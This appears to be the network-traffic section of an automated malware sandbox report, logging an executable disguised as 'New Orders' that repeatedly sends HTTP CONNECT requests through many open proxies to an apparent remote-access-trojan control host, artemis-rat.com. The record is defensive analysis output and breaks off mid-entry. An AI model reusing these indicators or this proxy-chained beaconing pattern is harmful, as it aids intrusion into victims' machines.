                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1601192.168.2.95459167.43.236.2030117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.000421047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.674952030 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1602192.168.2.954668104.21.64.208807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.000575066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.155565023 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1603192.168.2.954674104.16.108.234807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.002932072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.157641888 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1604192.168.2.954696104.19.120.84807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.003218889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.158132076 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1605192.168.2.95463767.43.227.227127237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.003577948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.521064997 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1606192.168.2.95303091.134.140.160208967672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.003580093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476552963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.977037907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070503950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.164007902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.164141893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.164052963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.164004087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1607192.168.2.95422151.75.125.20827367672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.003688097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.163928986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.164433956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.164148092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.273132086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.273102045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1608192.168.2.954179207.180.198.241573277672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.003798962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1609192.168.2.950117156.232.9.19480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.003928900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.163748980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.164177895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.164174080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.273066044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1610192.168.2.953228107.178.9.18680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.025151014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.163928986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.036040068 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1611192.168.2.954825211.234.125.54437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.039160013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1612192.168.2.95482645.144.30.2324437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.039845943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1613192.168.2.95453889.218.8.15210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.047811985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1614192.168.2.95465118.117.144.24890807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.048048019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.283875942 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1615192.168.2.95457714.47.70.13780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.143287897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.945286036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945501089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.396251917 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1616192.168.2.95418343.255.113.232847672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.144478083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.498343945 CET208INHTTP/1.0 404 Not Found
                                                                                        Server: HCS
                                                                                        Date: Mon, 11 Mar 2024 18:04:09 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 432
                                                                                        HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                        X-NGAA: MISS from CH-XW-NO1-315.4
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1617192.168.2.95425652.151.210.20490027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.153975010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1618192.168.2.954714172.67.250.212807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.154361010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.310264111 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1619192.168.2.954560103.190.54.141807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.154452085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1620192.168.2.95467845.196.151.9754327672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.154489994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.373048067 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 65
                                                                                        Proxy-Authenticate: Basic realm="Proxy"
                                                                                        Connection: close
                                                                                        Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                        Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1621192.168.2.95457379.110.202.13180817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.154830933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1622192.168.2.954709162.159.242.252807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.158826113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.325090885 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
